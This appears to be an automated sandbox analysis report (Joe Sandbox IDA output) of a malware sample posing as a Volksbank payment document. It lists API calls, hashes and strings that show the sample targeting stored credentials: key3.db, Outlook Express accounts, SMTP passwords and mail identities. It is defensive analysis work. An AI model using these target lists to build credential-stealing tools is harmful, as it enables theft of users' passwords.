  • Part of subcall function 00406D01: CreateFileA.KERNEL32(eBD,80000000,00000001,00000000,00000003,00000000,00000000,004441A1,?,ACD,00444265,?,?,*.oeaccount,ACD,?), ref: 00406D13
• GetFileSize.KERNEL32(00000000,00000000,key3.db,00000143,00000000,?,00406C55,00000000,?,00000000,?), ref: 00406AEB
• CloseHandle.KERNEL32(?,?,00406C55,00000000,?,00000000,?), ref: 00406B11
  • Part of subcall function 00407902: ??3@YAXPAX@Z.MSVCRT(00000000,00406B00,?,00406C55,00000000,?,00000000,?), ref: 00407909
  • Part of subcall function 00407902: ??2@YAPAXI@Z.MSVCRT(00000000,00406B00,?,00406C55,00000000,?,00000000,?), ref: 00407917
  • Part of subcall function 00407560: ReadFile.KERNEL32(00000000,?,004441E4,00000000,00000000,?,?,004441E4,?,00000000), ref: 00407577
Strings
Similarity
• API ID: File$??2@??3@CloseCreateHandleReadSize
• String ID: Ul@$key3.db
• API String ID: 1968906679-1563549157
APIs
• _strcmpi.MSVCRT ref: 0040E134
• _strcmpi.MSVCRT ref: 0040E14D
• _mbscpy.MSVCRT(?,smtp,0040DE7F,0040DE7F,?,?,00000000,000000FF), ref: 0040E19A
Strings
Similarity
• API ID: _strcmpi$_mbscpy
• String ID: smtp
• API String ID: 2625860049-60245459
APIs
  • Part of subcall function 00410A9C: RegOpenKeyExA.KERNELBASE(80000002,80000002,00000000,00020019,80000002,00410E4A,80000002,Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders,00000000,?,?,00000104), ref: 00410AAF
• memset.MSVCRT ref: 00408258
  • Part of subcall function 00410B62: RegEnumKeyExA.ADVAPI32(00000000,?,?,000000FF,00000000,00000000,00000000,?,?,00000000), ref: 00410B85
• RegCloseKey.ADVAPI32(?,?,?,?,?,?,?,?,?,?,?,00000000,000000FF,?,?,?), ref: 004082A6
• RegCloseKey.ADVAPI32(?,?,?,?,?,?,?,?,?,?,?,00000000,000000FF,?,?,?), ref: 004082C3
Strings
• Software\Google\Google Desktop\Mailboxes, xrefs: 00408230
Similarity
• API ID: Close$EnumOpenmemset
• String ID: Software\Google\Google Desktop\Mailboxes
• API String ID: 2255314230-2212045309
APIs
• memset.MSVCRT ref: 0040C28C
• SetFocus.USER32(?,?), ref: 0040C314
  • Part of subcall function 0040C256: PostMessageA.USER32(?,00000415,00000000,00000000), ref: 0040C265
Strings
Similarity
• API ID: FocusMessagePostmemset
• String ID: S_@$l
• API String ID: 3436799508-4018740455
APIs
Strings
Similarity
• API ID: _mbscpy
• String ID: C^@$X$ini
• API String ID: 714388716-917056472
APIs
  • Part of subcall function 00406FC7: memset.MSVCRT ref: 00406FD1
  • Part of subcall function 00406FC7: _mbscpy.MSVCRT(?,00000000,?,00000000,0000003C,00000000,?,0040709F,Arial,0000000E,00000000), ref: 00407011
• CreateFontIndirectA.GDI32(?), ref: 0040101F
• SendDlgItemMessageA.USER32(?,000003EC,00000030,00000000,00000000), ref: 0040103E
• SendDlgItemMessageA.USER32(?,000003EE,00000030,?,00000000), ref: 0040105B
Strings
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000003.00000002.2979448334.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.2979448334.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.2979448334.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_3_2_400000_Payment_Volksbank_EUR36550-Bestellung -4500673541.jbxd
Similarity
• API ID: ItemMessageSend$CreateFontIndirect_mbscpymemset
• String ID: MS Sans Serif
• API String ID: 3492281209-168460110
• Opcode ID: fba1b153f1476fe7d17889d81f23932038493b3a6f8049a49ffc4c2ea38943aa
• Instruction ID: 97d77737ff66efe52178e6fda6de2dc92fca71035f8b3f8e7b76904d62d162b3
• Opcode Fuzzy Hash: fba1b153f1476fe7d17889d81f23932038493b3a6f8049a49ffc4c2ea38943aa
• Instruction Fuzzy Hash: F5F02775A4130477E7317BA0EC47F4A3BACAB41B00F044535F652B50E1D2F4A404CB48
Memory Dump Source
• Source File: 00000003.00000002.2979448334.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000003.00000002.2979448334.0000000000456000.00000040.80000000.00040000.00000000.sdmp
• Associated: 00000003.00000002.2979448334.000000000045C000.00000040.80000000.00040000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_3_2_400000_Payment_Volksbank_EUR36550-Bestellung -4500673541.jbxd

Similarity
• API ID: ClassName_strcmpimemset
• String ID: edit
• API String ID: 275601554-2167791130
• Opcode ID: db8b236e199e929443ba679e8cc25b3238d768833fac675e2ea724ace2b39a9c
• Instruction ID: 4378e7120b76b93f9ba7f3ad81c4d59275eb15acd3879ac3f183c71196eabbb1
• Opcode Fuzzy Hash: db8b236e199e929443ba679e8cc25b3238d768833fac675e2ea724ace2b39a9c
• Instruction Fuzzy Hash: ADE09BB2C4016A6AEB21A664DC01FE5776CDF59704F0400B6B945E2081E6A4A6884A95
Memory Dump Source
• Source File: 00000003.00000002.2979448334.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000003.00000002.2979448334.0000000000456000.00000040.80000000.00040000.00000000.sdmp
• Associated: 00000003.00000002.2979448334.000000000045C000.00000040.80000000.00040000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_3_2_400000_Payment_Volksbank_EUR36550-Bestellung -4500673541.jbxd

Similarity
• API ID: strlen$_mbscat
• String ID: 3CD
• API String ID: 3951308622-1938365332
• Opcode ID: ea07c3cf78fe23fa274cd57f6e103936ddd3628895d35173825c115ee7dc3945
• Instruction ID: 1107c6f19d6a4433d5fdc1d3c5cfb72f3531f1d81a70b052f8a244d3c085287a
• Opcode Fuzzy Hash: ea07c3cf78fe23fa274cd57f6e103936ddd3628895d35173825c115ee7dc3945
• Instruction Fuzzy Hash: 1BD0A77390C2603AE61566167C42F8E5BC1CFD433AB15081FF408D1281DA3DE881809D
Memory Dump Source
• Source File: 00000003.00000002.2979448334.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000003.00000002.2979448334.0000000000456000.00000040.80000000.00040000.00000000.sdmp
• Associated: 00000003.00000002.2979448334.000000000045C000.00000040.80000000.00040000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_3_2_400000_Payment_Volksbank_EUR36550-Bestellung -4500673541.jbxd

Similarity
• API ID: _mbscat$_mbscpy
• String ID: Password2
• API String ID: 2600922555-1856559283
• Opcode ID: de5dfba976b8437d2c47849deb952c43e7b11cdba93a79face7e306b42b81b64
• Instruction ID: daa9138b3154c9efe9c83666f212cf2f945430f9457ac718319f22168f8299cd
• Opcode Fuzzy Hash: de5dfba976b8437d2c47849deb952c43e7b11cdba93a79face7e306b42b81b64
• Instruction Fuzzy Hash: 5BC01202A4667032210275555D07F8E5818CE9279B704005BB90832113D61D965542EF
APIs
• LoadLibraryA.KERNEL32(shell32.dll,0040CF6F,76940A60,?,00000000), ref: 00410D1C
• GetProcAddress.KERNEL32(00000000,SHGetSpecialFolderPathA), ref: 00410D31
Memory Dump Source
• Source File: 00000003.00000002.2979448334.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000003.00000002.2979448334.0000000000456000.00000040.80000000.00040000.00000000.sdmp
• Associated: 00000003.00000002.2979448334.000000000045C000.00000040.80000000.00040000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_3_2_400000_Payment_Volksbank_EUR36550-Bestellung -4500673541.jbxd

Similarity
• API ID: AddressLibraryLoadProc
• String ID: SHGetSpecialFolderPathA$shell32.dll
• API String ID: 2574300362-543337301
• Opcode ID: bd9125e53ebb38e22ea027c358b92ac6a95cbb2b5ce42350ffb603c3f4eeef8b
• Instruction ID: ef400fb4b1d3fc6097741d3c7ce2aeca37e2dca3c44752f23935f4d935815712
• Opcode Fuzzy Hash: bd9125e53ebb38e22ea027c358b92ac6a95cbb2b5ce42350ffb603c3f4eeef8b
• Instruction Fuzzy Hash: C9D0C9F8D063099AE7005BA1AD297167AB4E719312F041536A540A5263EBBCD094CE1D
Memory Dump Source
• Source File: 00000003.00000002.2979448334.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000003.00000002.2979448334.0000000000456000.00000040.80000000.00040000.00000000.sdmp
• Associated: 00000003.00000002.2979448334.000000000045C000.00000040.80000000.00040000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_3_2_400000_Payment_Volksbank_EUR36550-Bestellung -4500673541.jbxd

Similarity
• API ID: memset
• String ID: rows deleted
• API String ID: 2221118986-571615504
• Opcode ID: b98c805d9f7a15f03bb69ae15e6c6b0a921ed9a197951f9464e59faa98c73a57
• Instruction ID: 17dfb349c3cd8fc2c2490db290532cf881f14abfa8d6012d9aa572d9710d7201
• Opcode Fuzzy Hash: b98c805d9f7a15f03bb69ae15e6c6b0a921ed9a197951f9464e59faa98c73a57
• Instruction Fuzzy Hash: D5028171E00218AFDF14DFA5D981AEEBBB5FF08314F14005AF914B7291D7B9AA41CBA4
APIs
• memcpy.MSVCRT(?,00000000,00000030,00000000), ref: 0041BC7F
• memcpy.MSVCRT(?,-00000030,00000030,?,00000000,00000030,00000000), ref: 0041BC95
• memcmp.MSVCRT(?,?,00000030,?,-00000030,00000030,?,00000000,00000030,00000000), ref: 0041BCA4
• memcmp.MSVCRT(?,?,00000030,?,?,?,?,?,?,?,?,00000000), ref: 0041BCEC
• memcpy.MSVCRT(?,?,00000030,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 0041BD07
Memory Dump Source
• Source File: 00000003.00000002.2979448334.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000003.00000002.2979448334.0000000000456000.00000040.80000000.00040000.00000000.sdmp
• Associated: 00000003.00000002.2979448334.000000000045C000.00000040.80000000.00040000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_3_2_400000_Payment_Volksbank_EUR36550-Bestellung -4500673541.jbxd

                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: memcpy$memcmp
                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                          • API String ID: 3384217055-0
                                                                                                                                                                                                                                          • Opcode ID: a7e4a582387d1845e8bd5b90d9047dd349a2d991c238cbacbbbcfe7ad7334891
                                                                                                                                                                                                                                          • Instruction ID: 8228d9f6412a3e952053f7d3f56c39de874a44e07f5fc6281cc9d0b5593e34d3
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: a7e4a582387d1845e8bd5b90d9047dd349a2d991c238cbacbbbcfe7ad7334891
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: C8215172E102896BEB19DBA5D846FAF73FCEB84700F00446AB511D7281FB28E644C765
APIs
  • Part of subcall function 004073B3: memset.MSVCRT ref: 004073C1
• ??2@YAPAXI@Z.MSVCRT(00000020,?,00000000,00000000,0044409F,?,004441FB,?,00000000), ref: 004433A0
• ??2@YAPAXI@Z.MSVCRT(00000020,00000000,00000000,0044409F,?,004441FB,?,00000000), ref: 004433BE
• ??2@YAPAXI@Z.MSVCRT(00000014,00000000,00000000,0044409F,?,004441FB,?,00000000), ref: 004433D9
• ??2@YAPAXI@Z.MSVCRT(00000014,00000000,00000000,0044409F,?,004441FB,?,00000000), ref: 00443402
• ??2@YAPAXI@Z.MSVCRT(00000014,00000000,00000000,0044409F,?,004441FB,?,00000000), ref: 00443426
Memory Dump Source
• Source File: 00000003.00000002.2979448334.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000003.00000002.2979448334.0000000000456000.00000040.80000000.00040000.00000000.sdmp
• Associated: 00000003.00000002.2979448334.000000000045C000.00000040.80000000.00040000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_3_2_400000_Payment_Volksbank_EUR36550-Bestellung -4500673541.jbxd
Similarity
• API ID: ??2@$memset
• String ID:
• API String ID: 1860491036-0
• Opcode ID: 5d3be79d398e0043749495dd296c093f7ddeccd389f7318e4c6f9d3722586f48
• Instruction ID: bd2fcbe50e3d5b8ec1466eca70e60fda3411ba7e10a355e4f398212a99dd52d4
• Opcode Fuzzy Hash: 5d3be79d398e0043749495dd296c093f7ddeccd389f7318e4c6f9d3722586f48
• Instruction Fuzzy Hash: 973162B09107508FE751DF3A8845A16FBE4FF80B05F25486FD549CB2A2E779E5408B19
APIs
• memset.MSVCRT ref: 004048C2
• memset.MSVCRT ref: 004048D6
• memset.MSVCRT ref: 004048EA
• memcpy.MSVCRT(?,00406667,?,?,00000000,000000FF,?,00000000,000000FF,?,00000000,000000FF,?,?,?), ref: 004048FC
• memcpy.MSVCRT(?,00406667,?,?,00406667,?,?,00000000,000000FF,?,00000000,000000FF,?,00000000,000000FF,?), ref: 0040490E
Memory Dump Source
• Source File: 00000003.00000002.2979448334.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000003.00000002.2979448334.0000000000456000.00000040.80000000.00040000.00000000.sdmp
• Associated: 00000003.00000002.2979448334.000000000045C000.00000040.80000000.00040000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_3_2_400000_Payment_Volksbank_EUR36550-Bestellung -4500673541.jbxd
Similarity
• API ID: memset$memcpy
• String ID:
• API String ID: 368790112-0
• Opcode ID: e33439cddf26871f1b6b72d3f102fac71f305b2afc07238da9e6d18acb06c1a9
• Instruction ID: 0e4d5a8aef3e538851842ff93af65fc880b0f2046ec3e537946e92548d274f73
• Opcode Fuzzy Hash: e33439cddf26871f1b6b72d3f102fac71f305b2afc07238da9e6d18acb06c1a9
• Instruction Fuzzy Hash: BB2162B650115DABDF11EE68CD41EDE77ACDF95304F0040A6B708E3151D2749F448B64
APIs
• memset.MSVCRT ref: 0040D2C2
• memset.MSVCRT ref: 0040D2D8
• memset.MSVCRT ref: 0040D2EA
• memcpy.MSVCRT(?,?,00000010,?,00000000,00000000,?,?,?,?,?,?,00000000,0040381A,00000000), ref: 0040D30F
• memset.MSVCRT ref: 0040D319
Memory Dump Source
• Source File: 00000003.00000002.2979448334.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000003.00000002.2979448334.0000000000456000.00000040.80000000.00040000.00000000.sdmp
• Associated: 00000003.00000002.2979448334.000000000045C000.00000040.80000000.00040000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_3_2_400000_Payment_Volksbank_EUR36550-Bestellung -4500673541.jbxd
Similarity
• API ID: memset$memcpy
• String ID:
• API String ID: 368790112-0
• Opcode ID: b4e43ced28bb4930618584d198fe59dd62a49c5b1c6a4db04c735ab4a5314c67
• Instruction ID: 358c417c53aa398974aae77e4359fd90ac0a4dba5340dfd55ca125e4bb0c9b0b
• Opcode Fuzzy Hash: b4e43ced28bb4930618584d198fe59dd62a49c5b1c6a4db04c735ab4a5314c67
• Instruction Fuzzy Hash: 8E01D8B5A40B406BE235AE25CC03F2AB3A8DF91714F400A2EF692676C1D7B8F509915D
Strings
• variable number must be between ?1 and ?%d, xrefs: 0042C5C2
• too many SQL variables, xrefs: 0042C6FD
Memory Dump Source
• Source File: 00000003.00000002.2979448334.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000003.00000002.2979448334.0000000000456000.00000040.80000000.00040000.00000000.sdmp
• Associated: 00000003.00000002.2979448334.000000000045C000.00000040.80000000.00040000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_3_2_400000_Payment_Volksbank_EUR36550-Bestellung -4500673541.jbxd
Similarity
• API ID: memset
• String ID: too many SQL variables$variable number must be between ?1 and ?%d
• API String ID: 2221118986-515162456
• Opcode ID: 60d5f5fef70a29d847aa1be0b0a9f40863d4de5ddd7e716af81dbeaf9fd2ce2b
• Instruction ID: 69d39437184f158b69242413db2932325e78deb4f0df02558d14bae7a1bb2b74
• Opcode Fuzzy Hash: 60d5f5fef70a29d847aa1be0b0a9f40863d4de5ddd7e716af81dbeaf9fd2ce2b
• Instruction Fuzzy Hash: 93518B31B00626EFDB29DF68D481BEEB7A4FF09304F50016BE811A7251D779AD51CB88
APIs
• memcpy.MSVCRT(00000000,?,00000000), ref: 0043007E
Memory Dump Source
• Source File: 00000003.00000002.2979448334.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000003.00000002.2979448334.0000000000456000.00000040.80000000.00040000.00000000.sdmp
• Associated: 00000003.00000002.2979448334.000000000045C000.00000040.80000000.00040000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_3_2_400000_Payment_Volksbank_EUR36550-Bestellung -4500673541.jbxd
Similarity
• API ID: memcpy
• String ID: $, $CREATE TABLE
• API String ID: 3510742995-3459038510
• Opcode ID: ec2d01fe33c012397d4d1731dfc45432bb5b9ee0a9ad26789851577151ff7e1c
• Instruction ID: b8263f634f048474639948e4306e081d81924a11902ad0262d34aeb61c893b0c
• Opcode Fuzzy Hash: ec2d01fe33c012397d4d1731dfc45432bb5b9ee0a9ad26789851577151ff7e1c
• Instruction Fuzzy Hash: C351A472D00129DFCF10CF94D541AAFB7F4EF49319F61406BE840EB205E778AA4A8B98
APIs
  • Part of subcall function 00410B00: RegQueryValueExA.ADVAPI32(?,?,00000000,?,?,?,?,?,00402658,?), ref: 00410B16
• WideCharToMultiByte.KERNEL32(00000000,00000000,?,000000FF,?,0000007F,00000000,00000000,?,?,00000400,00000001), ref: 004026E4
• memset.MSVCRT ref: 004026AD
  • Part of subcall function 004108E5: UuidFromStringA.RPCRT4(220D5CD0-853A-11D0-84BC-00C04FD43F8F,00000001), ref: 00410902
  • Part of subcall function 004108E5: UuidFromStringA.RPCRT4(417E2D75-84BD-11D0-84BB-00C04FD43F8F,?), ref: 00410923
  • Part of subcall function 004108E5: memcpy.MSVCRT(?,00000000,?,00000001,?,?,?,00000000), ref: 00410961
  • Part of subcall function 004108E5: CoTaskMemFree.COMBASE(00000000), ref: 00410970
• WideCharToMultiByte.KERNEL32(00000000,00000000,?,00000002,?,0000007F,00000000,00000000,00000002,00000000,?), ref: 0040279C
                                                                                                                                                                                                                                          • LocalFree.KERNEL32(?), ref: 004027A6
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000003.00000002.2979448334.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.2979448334.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.2979448334.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_3_2_400000_Payment_Volksbank_EUR36550-Bestellung -4500673541.jbxd
Similarity
• API ID: ByteCharFreeFromMultiStringUuidWide$LocalQueryTaskValuememcpymemset
• String ID:
• API String ID: 3503910906-0
• Opcode ID: f86a270f64af7f2cfe52cb4533637fefaa5bfeff9622a9a4a07cc31b63cb9060
• Instruction ID: aa14e43d8b473801bf9d2631992dc1640396fa6537153de3cc175e43cdbeb3f4
• Opcode Fuzzy Hash: f86a270f64af7f2cfe52cb4533637fefaa5bfeff9622a9a4a07cc31b63cb9060
• Instruction Fuzzy Hash: 0B4183B1408384BFD711DB60CD85AAB77D8AF89314F044A3FF998A31C1D679DA44CB5A
APIs
• memset.MSVCRT ref: 0040C922
• SendMessageA.USER32(00000000,00000423,00000000,00000000), ref: 0040C966
• GetMenuStringA.USER32(?,00000103,?,0000004F,00000000), ref: 0040C980
• PostMessageA.USER32(?,00000402,00000000,00000000), ref: 0040CA23
Similarity
• API ID: Message$MenuPostSendStringmemset
• String ID:
• API String ID: 3798638045-0
• Opcode ID: 5260d67871d0b89722168e7d498f4e0a86ca69d9cc9d8627ca4b69d99b7a7acc
• Instruction ID: 1bc0f942f430aed347c7303033341c470b8779a554354b53929018aa447f6f2a
• Opcode Fuzzy Hash: 5260d67871d0b89722168e7d498f4e0a86ca69d9cc9d8627ca4b69d99b7a7acc
• Instruction Fuzzy Hash: A241D071600215EBCB24CF24C8C5B97B7A4BF05325F1483B6E958AB2D2C3789D81CBD8
APIs
  • Part of subcall function 00409DED: ??2@YAPAXI@Z.MSVCRT(00000000,?,00000000), ref: 00409E0E
  • Part of subcall function 00409DED: ??3@YAXPAX@Z.MSVCRT(00000000,?,00000000), ref: 00409ED5
• strlen.MSVCRT ref: 0040B60B
• atoi.MSVCRT(?,00000000,?,76940A60,?,00000000), ref: 0040B619
• _mbsicmp.MSVCRT ref: 0040B66C
• _mbsicmp.MSVCRT ref: 0040B67F
Similarity
• API ID: _mbsicmp$??2@??3@atoistrlen
• String ID:
• API String ID: 4107816708-0
• Opcode ID: 8a979a692496cc45569841ba41d4e8351d04b0c3b5ff677985e3e0399502aae0
• Instruction ID: e44d10e2ba05df3f3c4ea20365ac2b40f6a529c5f902ff1350b2aa0f2f7d2ce1
• Opcode Fuzzy Hash: 8a979a692496cc45569841ba41d4e8351d04b0c3b5ff677985e3e0399502aae0
• Instruction Fuzzy Hash: 3A413D35900204EFCF10DFA9C481AA9BBF4FF48348F1144BAE815AB392D739DA41CB99
APIs
Strings
Similarity
• API ID: strlen
• String ID: >$>$>
• API String ID: 39653677-3911187716
• Opcode ID: 6e84f8e65513e4ca611a7ecef136956de2a5ef3a612ab72f4111d806a255a350
• Instruction ID: 00f684ae2741cafacb4c0f359147db44c9a3c2c025b4d94400920e38b4f60055
• Opcode Fuzzy Hash: 6e84f8e65513e4ca611a7ecef136956de2a5ef3a612ab72f4111d806a255a350
• Instruction Fuzzy Hash: E131261180D6C4AEEB11CFA880463EEFFB05FA2304F5886DAD0D047743C67C964AC3AA
APIs
• memcpy.MSVCRT(?,00000000,00000040,00000000,0000041E,00000000,?,00444A02,?,?,?,00000008,?,00000000,00000000), ref: 0040D248
• memcpy.MSVCRT(?,00000000,00000040,00000000,0000041E,00000000,?,00444A02,?,?,?,00000008,?,00000000,00000000), ref: 0040D272
• memcpy.MSVCRT(?,00000000,00000008,00000000,0000041E,00000000,?,00444A02,?,?,?,00000008,?,00000000,00000000), ref: 0040D296
Strings
Similarity
• API ID: memcpy
• String ID: @
• API String ID: 3510742995-2766056989
• Opcode ID: 5364360adcdec80b12010bd2de721da4a734fa53c949916e07c670fac02dc71b
• Instruction ID: 6d1199ef97cb2679a5b3fe4a4c98cea7b7ae300cfbacc21e3dff9814a3884c4c
• Opcode Fuzzy Hash: 5364360adcdec80b12010bd2de721da4a734fa53c949916e07c670fac02dc71b
• Instruction Fuzzy Hash: 41113DB2E007046BDB288E96DC80D5A77A8EFA0354700013FFE06662D1F639EA5DC7D8
APIs
Strings
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: _strcmpi
                                                                                                                                                                                                                                          • String ID: C@$mail.identity
                                                                                                                                                                                                                                          • API String ID: 1439213657-721921413
APIs
• SHGetMalloc.SHELL32(?), ref: 00410F20
• SHBrowseForFolder.SHELL32(?), ref: 00410F52
• SHGetPathFromIDList.SHELL32(00000000,?), ref: 00410F66
• _mbscpy.MSVCRT(?,?), ref: 00410F79
Memory Dump Source
• Source File: 00000003.00000002.2979448334.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000003.00000002.2979448334.0000000000456000.00000040.80000000.00040000.00000000.sdmp
• Associated: 00000003.00000002.2979448334.000000000045C000.00000040.80000000.00040000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_3_2_400000_Payment_Volksbank_EUR36550-Bestellung -4500673541.jbxd
Similarity
• API ID: BrowseFolderFromListMallocPath_mbscpy
• String ID:
• API String ID: 1479990042-0
APIs
• memset.MSVCRT ref: 00406640
  • Part of subcall function 004063B2: memset.MSVCRT ref: 0040644F
  • Part of subcall function 004063B2: memcpy.MSVCRT(?,00000060,?,?,00000000,?), ref: 00406462
  • Part of subcall function 004063B2: memcpy.MSVCRT(?,00000060,?,?,?,?,?,00000000,?), ref: 00406475
• memcmp.MSVCRT(?,00456EA0,00000010,?,?,?,00000060,?,?,00000000,00000000), ref: 00406672
• memcpy.MSVCRT(?,?,00000018,?,00000060,?,?,00000000,00000000), ref: 00406695
Strings
Memory Dump Source
• Source File: 00000003.00000002.2979448334.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000003.00000002.2979448334.0000000000456000.00000040.80000000.00040000.00000000.sdmp
• Associated: 00000003.00000002.2979448334.000000000045C000.00000040.80000000.00040000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_3_2_400000_Payment_Volksbank_EUR36550-Bestellung -4500673541.jbxd
Similarity
• API ID: memcpy$memset$memcmp
• String ID: Ul@
• API String ID: 270934217-715280498
APIs
  • Part of subcall function 00408DB6: LoadStringA.USER32(00000000,0000000D,?,?), ref: 00408E7F
  • Part of subcall function 00408DB6: memcpy.MSVCRT(00000000,00000001,?,?,?,?,?,00000000,76940A60), ref: 00408EBE
• sprintf.MSVCRT ref: 0040B929
• SendMessageA.USER32(?,00000401,00000000,?), ref: 0040B98C
  • Part of subcall function 00408DB6: _mbscpy.MSVCRT(0045A550,strings,?,?,00409CE2,?,?,?,?,?,00000000,76940A60), ref: 00408E31
  • Part of subcall function 00408DB6: strlen.MSVCRT ref: 00408E4F
• sprintf.MSVCRT ref: 0040B953
• _mbscat.MSVCRT ref: 0040B966
Memory Dump Source
• Source File: 00000003.00000002.2979448334.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000003.00000002.2979448334.0000000000456000.00000040.80000000.00040000.00000000.sdmp
• Associated: 00000003.00000002.2979448334.000000000045C000.00000040.80000000.00040000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_3_2_400000_Payment_Volksbank_EUR36550-Bestellung -4500673541.jbxd
Similarity
• API ID: sprintf$LoadMessageSendString_mbscat_mbscpymemcpystrlen
• String ID:
• API String ID: 203655857-0
APIs
• memset.MSVCRT ref: 0040ADE8
• memset.MSVCRT ref: 0040ADFE
  • Part of subcall function 0040A4E6: _mbscpy.MSVCRT(00000000,?,0040ABD2,?,?,?), ref: 0040A4EB
  • Part of subcall function 0040A4E6: _strlwr.MSVCRT ref: 0040A52E
• sprintf.MSVCRT ref: 0040AE28
  • Part of subcall function 00406D33: strlen.MSVCRT ref: 00406D40
  • Part of subcall function 00406D33: WriteFile.KERNEL32(0044CBC0,00000001,00000000,76940A60,00000000,?,?,0040A7BE,00000001,0044CBC0,76940A60), ref: 00406D4D
Strings
Memory Dump Source
• Source File: 00000003.00000002.2979448334.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000003.00000002.2979448334.0000000000456000.00000040.80000000.00040000.00000000.sdmp
• Associated: 00000003.00000002.2979448334.000000000045C000.00000040.80000000.00040000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_3_2_400000_Payment_Volksbank_EUR36550-Bestellung -4500673541.jbxd
Similarity
• API ID: memset$FileWrite_mbscpy_strlwrsprintfstrlen
• String ID: </%s>
• API String ID: 3699762281-259020660
APIs
Strings
Memory Dump Source
• Source File: 00000003.00000002.2979448334.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000003.00000002.2979448334.0000000000456000.00000040.80000000.00040000.00000000.sdmp
• Associated: 00000003.00000002.2979448334.000000000045C000.00000040.80000000.00040000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_3_2_400000_Payment_Volksbank_EUR36550-Bestellung -4500673541.jbxd
Similarity
• API ID: _ultoasprintf
• String ID: %s %s %s
• API String ID: 432394123-3850900253
APIs
• LoadMenuA.USER32(00000000), ref: 00409078
• sprintf.MSVCRT ref: 0040909B
  • Part of subcall function 00408F1B: GetMenuItemCount.USER32(?), ref: 00408F31
  • Part of subcall function 00408F1B: memset.MSVCRT ref: 00408F55
  • Part of subcall function 00408F1B: GetMenuItemInfoA.USER32(?), ref: 00408F8B
  • Part of subcall function 00408F1B: memset.MSVCRT ref: 00408FB8
  • Part of subcall function 00408F1B: strchr.MSVCRT ref: 00408FC4
  • Part of subcall function 00408F1B: _mbscat.MSVCRT ref: 0040901F
  • Part of subcall function 00408F1B: ModifyMenuA.USER32(?,?,00000400,?,?), ref: 0040903B
Strings
Memory Dump Source
• Source File: 00000003.00000002.2979448334.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000003.00000002.2979448334.0000000000456000.00000040.80000000.00040000.00000000.sdmp
• Associated: 00000003.00000002.2979448334.000000000045C000.00000040.80000000.00040000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_3_2_400000_Payment_Volksbank_EUR36550-Bestellung -4500673541.jbxd
Similarity
• API ID: Menu$Itemmemset$CountInfoLoadModify_mbscatsprintfstrchr
